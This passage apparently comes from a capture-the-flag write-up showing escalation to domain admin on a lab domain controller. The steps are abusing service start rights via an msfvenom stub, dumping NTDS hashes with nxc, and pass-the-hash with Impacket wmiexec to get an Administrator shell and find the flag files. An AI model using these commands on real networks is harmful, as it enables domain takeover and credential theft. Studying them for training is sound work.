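Run against the svcstats descriptor it shows that svc.services holds SERVICE_START but not SERVICE_QUERY_STATUS, so an opener that requests both is denied while an opener that requests SERVICE_START alone succeeds. For a real access check you would also expand the caller's token groups (BA, AU, and so on); the direct-SID match here is enough for a single explicit ACE like this one.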
PS C:\Users\svc.services> (New-Object System.ServiceProcess.ServiceController("svcstats")).Start()
Exception calling "Start" with "0" argument(s): "Cannot start service svcstats on computer '.'."
At line:1 char:1
+ (New-Object System.ServiceProcess.ServiceController("svcstats")).Star ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : InvalidOperationException
This exception is not a status-check failure. ServiceController.Start() opens the service with SERVICE_START only, calls StartService, and throws InvalidOperationException ("Cannot start service ...") when that call returns an error; the underlying Win32 error is carried in the inner exception. The likely cause here is that the msfvenom exec stub is not a real service executable: it never calls StartServiceCtrlDispatcher, so the SCM launches the process, the embedded net localgroup command runs, and the SCM then reports that the service did not respond (error 1053). By that point the side effect we wanted has already happened.
Checking again, nxc now reports (Pwn3d!): svc.services has joined the local Administrators group!
> nxc smb 10.1.60.192 -u svc.services -p 'S3****************'
SMB 10.1.60.192 445 DC-404 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-404) (domain:404finance.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.60.192 445 DC-404 [+] 404finance.local\svc.services:S3**************** (Pwn3d!)
Because this host is the domain controller, its local Administrators group is the domain's built-in Administrators group, so svc.services can now read the NTDS database. Dumping it with nxc:
> nxc smb 10.1.60.192 -u svc.services -p 'S3*************!' --ntds
SMB 10.1.60.192 445 DC-404 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-404) (domain:404finance.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.60.192 445 DC-404 [+] 404finance.local\svc.services:S3*************! (Pwn3d!)
SMB 10.1.60.192 445 DC-404 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.1.60.192 445 DC-404 Administrator:500:aa****************************ee:a6****************************92:::
SMB 10.1.60.192 445 DC-404 Guest:501:aa****************************ee:31****************************c0:::
SMB 10.1.60.192 445 DC-404 krbtgt:502:aa****************************ee:90****************************ff:::
SMB 10.1.60.192 445 DC-404 404finance.local\ka************:1103:aa****************************ee:60****************************f6:::
SMB 10.1.60.192 445 DC-404 404finance.local\to********:1104:aa****************************ee:89****************************fd:::
SMB 10.1.60.192 445 DC-404 404finance.local\ro**********:1105:aa****************************ee:a2****************************6b:::
SMB 10.1.60.192 445 DC-404 404finance.local\ni**********:1106:aa****************************ee:a2****************************6b:::
SMB 10.1.60.192 445 DC-404 404finance.local\ja********:1107:aa****************************ee:a2****************************6b:::
SMB 10.1.60.192 445 DC-404 404finance.local\me***********:1108:aa****************************ee:a2****************************6b:::
SMB 10.1.60.192 445 DC-404 404finance.local\da*************:1109:aa****************************ee:3a****************************32:::
SMB 10.1.60.192 445 DC-404 404finance.local\we******:1110:aa****************************ee:a2****************************6b:::
SMB 10.1.60.192 445 DC-404 404finance.local\sv**********:1112:aa****************************ee:dc****************************6c:::
SMB 10.1.60.192 445 DC-404 DC-404$:1000:aa****************************ee:94****************************89:::
SMB 10.1.60.192 445 DC-404 [+] Dumped 13 NTDS hashes
Using Impacket's wmiexec to obtain a semi-interactive Administrator shell via Pass-the-Hash with the dumped NT hash.
> python3 /home/y4t/Desktop/certipy-venv/bin/wmiexec.py 404finance.local/'administrator'@10.1.60.192 -hashes aad3b435b51404eeaad3b435b51404ee:a6019e48da8f602a60c30a6f0136d792
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
finance404\administrator
User Flag
C:\>dir c:\Users\daniel.hoffmann\Desktop
Volume in drive C has no label.
Volume Serial Number is 2CCF-A8C2
Directory of c:\Users\daniel.hoffmann\Desktop
07/02/2025 11:16 AM <DIR> .
07/02/2025 11:16 AM <DIR> ..
07/02/2025 11:16 AM 1,164 user.txt
1 File(s) 1,164 bytes
2 Dir(s) 35,702,448,128 bytes free
Root Flag
C:\>dir c:\Users\administrator\Desktop
Volume in drive C has no label.
Volume Serial Number is 2CCF-A8C2
Directory of c:\Users\administrator\Desktop
02/05/2026 10:03 AM <DIR> .
02/05/2026 10:03 AM <DIR> ..
07/03/2025 07:17 AM 6,235 root.txt
1 File(s) 6,235 bytes
2 Dir(s) 35,702,448,128 bytes free